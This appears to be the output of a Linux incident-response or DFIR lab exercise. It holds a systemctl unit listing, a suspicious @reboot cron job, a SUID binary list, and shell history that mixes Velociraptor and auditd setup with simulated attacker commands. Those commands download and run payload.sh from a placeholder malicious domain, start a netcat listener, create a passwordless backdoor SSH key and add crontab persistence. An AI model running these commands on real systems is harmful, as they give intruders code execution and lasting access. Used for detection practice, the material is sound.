sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8
sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9
sys-devices-virtual-block-loop0.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop0
sys-devices-virtual-block-loop1.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop1
sys-devices-virtual-block-loop10.device                                                                  loaded active plugged   /sys/devices/virtual/block/loop10
sys-devices-virtual-block-loop11.device                                                                  loaded active plugged   /sys/devices/virtual/block/loop11
sys-devices-virtual-block-loop12.device                                                                  loaded active plugged   /sys/devices/virtual/block/loop12
sys-devices-virtual-block-loop13.device                                                                  loaded active plugged   /sys/devices/virtual/block/loop13
sys-devices-virtual-block-loop2.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop2
sys-devices-virtual-block-loop3.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop3
sys-devices-virtual-block-loop4.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop4
sys-devices-virtual-block-loop5.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop5
sys-devices-virtual-block-loop6.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop6
sys-devices-virtual-block-loop7.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop7
sys-devices-virtual-block-loop8.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop8
sys-devices-virtual-block-loop9.device                                                                   loaded active plugged   /sys/devices/virtual/block/loop9
sys-devices-virtual-misc-rfkill.device                                                                   loaded active plugged   /sys/devices/virtual/misc/rfkill
sys-devices-virtual-tty-ttyprintk.device                                                                 loaded active plugged   /sys/devices/virtual/tty/ttyprintk
sys-module-configfs.device                                                                               loaded active plugged   /sys/module/configfs
sys-module-fuse.device                                                                                   loaded active plugged   /sys/module/fuse
sys-subsystem-net-devices-ens18.device                                                                   loaded active plugged   Virtio network device
-.mount                                                                                                  loaded active mounted   Root Mount
boot-efi.mount                                                                                           loaded active mounted   /boot/efi
dev-hugepages.mount                                                                                      loaded active mounted   Huge Pages File System
dev-mqueue.mount                                                                                         loaded active mounted   POSIX Message Queue File System
proc-sys-fs-binfmt_misc.mount                                                                            loaded active mounted   Arbitrary Executable File Formats File System
run-credentials-systemd\x2dsysusers.service.mount                                                        loaded active mounted   /run/credentials/systemd-sysusers.service
run-snapd-ns-firefox.mnt.mount                                                                           loaded active mounted   /run/snapd/ns/firefox.mnt
run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount                                                   loaded active mounted   /run/snapd/ns/snapd-desktop-integration.mnt
run-snapd-ns.mount                                                                                       loaded active mounted   /run/snapd/ns
run-user-1000-doc.mount                                                                                  loaded active mounted   /run/user/1000/doc
run-user-1000-gvfs.mount                                                                                 loaded active mounted   /run/user/1000/gvfs
run-user-1000.mount                                                                                      loaded active mounted   /run/user/1000
snap-bare-5.mount                                                                                        loaded active mounted   Mount unit for bare, revision 5
snap-core22-2133.mount                                                                                   loaded active mounted   Mount unit for core22, revision 2133
snap-core22-2139.mount                                                                                   loaded active mounted   Mount unit for core22, revision 2139
snap-firefox-7084.mount                                                                                  loaded active mounted   Mount unit for firefox, revision 7084
snap-firefox-7177.mount                                                                                  loaded active mounted   Mount unit for firefox, revision 7177
snap-gnome\x2d42\x2d2204-202.mount                                                                       loaded active mounted   Mount unit for gnome-42-2204, revision 202
snap-gnome\x2d42\x2d2204-226.mount                                                                       loaded active mounted   Mount unit for gnome-42-2204, revision 226
snap-gtk\x2dcommon\x2dthemes-1535.mount                                                                  loaded active mounted   Mount unit for gtk-common-themes, revision 1535
snap-snap\x2dstore-1113.mount                                                                            loaded active mounted   Mount unit for snap-store, revision 1113
snap-snap\x2dstore-1216.mount                                                                            loaded active mounted   Mount unit for snap-store, revision 1216
snap-snapd-25202.mount                                                                                   loaded active mounted   Mount unit for snapd, revision 25202
snap-snapd-25577.mount                                                                                   loaded active mounted   Mount unit for snapd, revision 25577
snap-snapd\x2ddesktop\x2dintegration-178.mount                                                           loaded active mounted   Mount unit for snapd-desktop-integration, revision 178
snap-snapd\x2ddesktop\x2dintegration-315.mount                                                           loaded active mounted   Mount unit for snapd-desktop-integration, revision 315
sys-fs-fuse-connections.mount                                                                            loaded active mounted   FUSE Control File System
sys-kernel-config.mount                                                                                  loaded active mounted   Kernel Configuration File System
sys-kernel-debug-tracing.mount                                                                           loaded active mounted   /sys/kernel/debug/tracing
sys-kernel-debug.mount                                                                                   loaded active mounted   Kernel Debug File System
sys-kernel-tracing.mount                                                                                 loaded active mounted   Kernel Trace File System
acpid.path                                                                                               loaded active running   ACPI Events Check
cups.path                                                                                                loaded active running   CUPS Scheduler
systemd-ask-password-plymouth.path                                                                       loaded active waiting   Forward Password Requests to Plymouth Directory Watch
systemd-ask-password-wall.path                                                                           loaded active waiting   Forward Password Requests to Wall Directory Watch
whoopsie.path                                                                                            loaded active waiting   Start whoopsie on modification of the /var/crash directory
init.scope                                                                                               loaded active running   System and Service Manager
session-2.scope                                                                                          loaded active running   Session 2 of User champuser
accounts-daemon.service                                                                                  loaded active running   Accounts Service
acpid.service                                                                                            loaded active running   ACPI event daemon
apparmor.service                                                                                         loaded active exited    Load AppArmor profiles
apport.service                                                                                           loaded active exited    LSB: automatic crash report generation
auditd.service                                                                                           loaded active running   Security Auditing Service
avahi-daemon.service                                                                                     loaded active running   Avahi mDNS/DNS-SD Stack
colord.service                                                                                           loaded active running   Manage, Install and Generate Color Profiles
console-setup.service                                                                                    loaded active exited    Set console font and keymap
cron.service                                                                                             loaded active running   Regular background program processing daemon
cups-browsed.service                                                                                     loaded active running   Make remote CUPS printers available locally
cups.service                                                                                             loaded active running   CUPS Scheduler
dbus.service                                                                                             loaded active running   D-Bus System Message Bus
gdm.service                                                                                              loaded active running   GNOME Display Manager
irqbalance.service                                                                                       loaded active running   irqbalance daemon
kerneloops.service                                                                                       loaded active running   Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service                                                                                   loaded active exited    Set the console keyboard layout
kmod-static-nodes.service                                                                                loaded active exited    Create List of Static Device Nodes
ModemManager.service                                                                                     loaded active running   Modem Manager
networkd-dispatcher.service                                                                              loaded active running   Dispatcher daemon for systemd-networkd
NetworkManager-wait-online.service                                                                       loaded active exited    Network Manager Wait Online
NetworkManager.service                                                                                   loaded active running   Network Manager
openvpn.service                                                                                          loaded active exited    OpenVPN service
packagekit.service                                                                                       loaded active running   PackageKit Daemon
plymouth-quit-wait.service                                                                               loaded active exited    Hold until boot process finishes up
plymouth-read-write.service                                                                              loaded active exited    Tell Plymouth To Write Out Runtime Data
plymouth-start.service                                                                                   loaded active exited    Show Plymouth Boot Screen
podman-restart.service                                                                                   loaded active exited    Podman Start All Containers With Restart Policy Set To Always
polkit.service                                                                                           loaded active running   Authorization Manager
power-profiles-daemon.service                                                                            loaded active running   Power Profiles daemon
rsyslog.service                                                                                          loaded active running   System Logging Service
rtkit-daemon.service                                                                                     loaded active running   RealtimeKit Scheduling Policy Service
setvtrgb.service                                                                                         loaded active exited    Set console scheme
snapd.apparmor.service                                                                                   loaded active exited    Load AppArmor profiles managed internally by snapd
snapd.seeded.service                                                                                     loaded active exited    Wait until snapd is fully seeded
snapd.service                                                                                            loaded active running   Snap Daemon
switcheroo-control.service                                                                               loaded active running   Switcheroo Control Proxy service
systemd-binfmt.service                                                                                   loaded active exited    Set Up Additional Binary Formats
systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service                                                    loaded active exited    File System Check on /dev/disk/by-uuid/4015-7165
systemd-journal-flush.service                                                                            loaded active exited    Flush Journal to Persistent Storage
systemd-journald.service                                                                                 loaded active running   Journal Service
systemd-logind.service                                                                                   loaded active running   User Login Management
systemd-modules-load.service                                                                             loaded active exited    Load Kernel Modules
systemd-oomd.service                                                                                     loaded active running   Userspace Out-Of-Memory (OOM) Killer
systemd-random-seed.service                                                                              loaded active exited    Load/Save Random Seed
systemd-remount-fs.service                                                                               loaded active exited    Remount Root and Kernel File Systems
systemd-resolved.service                                                                                 loaded active running   Network Name Resolution
systemd-sysctl.service                                                                                   loaded active exited    Apply Kernel Variables
systemd-sysusers.service                                                                                 loaded active exited    Create System Users
systemd-timesyncd.service                                                                                loaded active running   Network Time Synchronization
systemd-tmpfiles-setup-dev.service                                                                       loaded active exited    Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service                                                                           loaded active exited    Create Volatile Files and Directories
systemd-udev-trigger.service                                                                             loaded active exited    Coldplug All udev Devices
systemd-udevd.service                                                                                    loaded active running   Rule-based Manager for Device Events and Files
systemd-update-utmp.service                                                                              loaded active exited    Record System Boot/Shutdown in UTMP
systemd-user-sessions.service                                                                            loaded active exited    Permit User Sessions
udisks2.service                                                                                          loaded active running   Disk Manager
ufw.service                                                                                              loaded active exited    Uncomplicated firewall
unattended-upgrades.service                                                                              loaded active running   Unattended Upgrades Shutdown
upower.service                                                                                           loaded active running   Daemon for power management
[email protected]                                                                            loaded active exited    User Runtime Directory /run/user/1000
[email protected]                                                                                        loaded active running   User Manager for UID 1000
velociraptor.service                                                                                     loaded active running   Velociraprot linux amd64
wpa_supplicant.service                                                                                   loaded active running   WPA supplicant
-.slice                                                                                                  loaded active active    Root Slice
system-getty.slice                                                                                       loaded active active    Slice /system/getty
system-modprobe.slice                                                                                    loaded active active    Slice /system/modprobe
system-systemd\x2dfsck.slice                                                                             loaded active active    Slice /system/systemd-fsck
system.slice                                                                                             loaded active active    System Slice
user-1000.slice                                                                                          loaded active active    User Slice of UID 1000
user.slice                                                                                               loaded active active    User and Session Slice
acpid.socket                                                                                             loaded active running   ACPID Listen Socket
avahi-daemon.socket                                                                                      loaded active running   Avahi mDNS/DNS-SD Stack Activation Socket
cups.socket                                                                                              loaded active running   CUPS Scheduler
dbus.socket                                                                                              loaded active running   D-Bus System Message Bus Socket
podman.socket                                                                                            loaded active listening Podman API Socket
snapd.socket                                                                                             loaded active running   Socket activation for snappy daemon
syslog.socket                                                                                            loaded active running   Syslog Socket
systemd-fsckd.socket                                                                                     loaded active listening fsck to fsckd communication Socket
systemd-initctl.socket                                                                                   loaded active listening initctl Compatibility Named Pipe
systemd-journald-audit.socket                                                                            loaded active running   Journal Audit Socket
systemd-journald-dev-log.socket                                                                          loaded active running   Journal Socket (/dev/log)
systemd-journald.socket                                                                                  loaded active running   Journal Socket
systemd-rfkill.socket                                                                                    loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch
systemd-udevd-control.socket                                                                             loaded active running   udev Control Socket
systemd-udevd-kernel.socket                                                                              loaded active running   udev Kernel Socket
uuidd.socket                                                                                             loaded active listening UUID daemon activation socket
swapfile.swap                                                                                            loaded active active    /swapfile
basic.target                                                                                             loaded active active    Basic System
cryptsetup.target                                                                                        loaded active active    Local Encrypted Volumes
getty-pre.target                                                                                         loaded active active    Preparation for Logins
getty.target                                                                                             loaded active active    Login Prompts
graphical.target                                                                                         loaded active active    Graphical Interface
local-fs-pre.target                                                                                      loaded active active    Preparation for Local File Systems
local-fs.target                                                                                          loaded active active    Local File Systems
multi-user.target                                                                                        loaded active active    Multi-User System
network-online.target                                                                                    loaded active active    Network is Online
network-pre.target                                                                                       loaded active active    Preparation for Network
network.target                                                                                           loaded active active    Network
nss-lookup.target                                                                                        loaded active active    Host and Network Name Lookups
nss-user-lookup.target                                                                                   loaded active active    User and Group Name Lookups
paths.target                                                                                             loaded active active    Path Units
remote-fs.target                                                                                         loaded active active    Remote File Systems
slices.target                                                                                            loaded active active    Slice Units
snapd.mounts-pre.target                                                                                  loaded active active    Mounting snaps
snapd.mounts.target                                                                                      loaded active active    Mounted snaps
sockets.target                                                                                           loaded active active    Socket Units
swap.target                                                                                              loaded active active    Swaps
sysinit.target                                                                                           loaded active active    System Initialization
time-set.target                                                                                          loaded active active    System Time Set
timers.target                                                                                            loaded active active    Timer Units
veritysetup.target                                                                                       loaded active active    Local Verity Protected Volumes
anacron.timer                                                                                            loaded active waiting   Trigger anacron every hour
apt-daily-upgrade.timer                                                                                  loaded active waiting   Daily apt upgrade and clean activities
apt-daily.timer                                                                                          loaded active waiting   Daily apt download activities
dpkg-db-backup.timer                                                                                     loaded active waiting   Daily dpkg database backup timer
e2scrub_all.timer                                                                                        loaded active waiting   Periodic ext4 Online Metadata Check for All Filesystems
fstrim.timer                                                                                             loaded active waiting   Discard unused blocks once a week
fwupd-refresh.timer                                                                                      loaded active waiting   Refresh fwupd metadata regularly
logrotate.timer                                                                                          loaded active waiting   Daily rotation of log files
man-db.timer                                                                                             loaded active waiting   Daily man-db regeneration
motd-news.timer                                                                                          loaded active waiting   Message of the Day
podman-auto-update.timer                                                                                 loaded active waiting   Podman auto-update timer
systemd-tmpfiles-clean.timer                                                                             loaded active waiting   Daily Cleanup of Temporary Directories
update-notifier-download.timer                                                                           loaded active waiting   Download data for packages that failed at package install time
update-notifier-motd.timer                                                                               loaded active waiting   Check to see whether there is a new version of Ubuntu available
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
220 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- CronJob
@reboot /var/tmp/SecurityUpdate/svchost
--------------------------------- suid
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/gpasswd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chfn
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/mount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/newgrp
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chsh
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/passwd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/umount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/su
/snap/core22/2133/usr/bin/chfn
/snap/core22/2133/usr/bin/chsh
/snap/core22/2133/usr/bin/gpasswd
/snap/core22/2133/usr/bin/mount
/snap/core22/2133/usr/bin/newgrp
/snap/core22/2133/usr/bin/passwd
/snap/core22/2133/usr/bin/su
/snap/core22/2133/usr/bin/sudo
/snap/core22/2133/usr/bin/umount
/snap/core22/2133/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2133/usr/lib/openssh/ssh-keysign
/snap/core22/2133/usr/libexec/polkit-agent-helper-1
/snap/core22/2139/usr/bin/chfn
/snap/core22/2139/usr/bin/chsh
/snap/core22/2139/usr/bin/gpasswd
/snap/core22/2139/usr/bin/mount
/snap/core22/2139/usr/bin/newgrp
/snap/core22/2139/usr/bin/passwd
/snap/core22/2139/usr/bin/su
/snap/core22/2139/usr/bin/sudo
/snap/core22/2139/usr/bin/umount
/snap/core22/2139/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2139/usr/lib/openssh/ssh-keysign
/snap/core22/2139/usr/libexec/polkit-agent-helper-1
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/umount
/usr/bin/sudo
/usr/bin/su
/usr/libexec/polkit-agent-helper-1
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/xorg/Xorg.wrap
--------------------------------- Malicious Commands
chmod +x /usr/local/bin/velociraptor
velociraptor config generate -i
nano /root/server.config.yaml
nano /lib/systemd/system/velociraptor.service
systemctl daemon-reload
systemctl enable --now velociraptor
systemctl status velociraptor
systemctl restart velociraptor.service
nano /root/server.config.yaml
systemctl restart velociraptor.service
cls
clear
the key should be located in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated however. The "Installer" section is non existent meaning the key doesnt exist
for whatever reason I was only able to locate 17 registry keys using the hunt function. Lets move to windows now
ls
pwd
cat server.config.yaml
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
cd .ssh
cd /.ssh
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
apt install net-tools
cls
cleart
clear
install auditd
apt install auditd
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/auditrules -O /etc/audit/rules.d/audit.rules
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/audit.rules -O /etc/audit/rules.d/audit.rules
clear
systemctl restart audit.d
cleart
clear
systemctl restart auditd
systemctl status auditd
clear
tail /var/log/audit/auditlog
clear
tail /var/log/audit/audit.log
clear
wget https://research.cyfidant.com
clear
cat /var/log/audit/audit.log | grep wget
clear
grep wget /var/log/audit/audit.loc
grep wget /var/log/audit/audit.log
grep https://research.cyfidant.com /var/log/audit/audit.log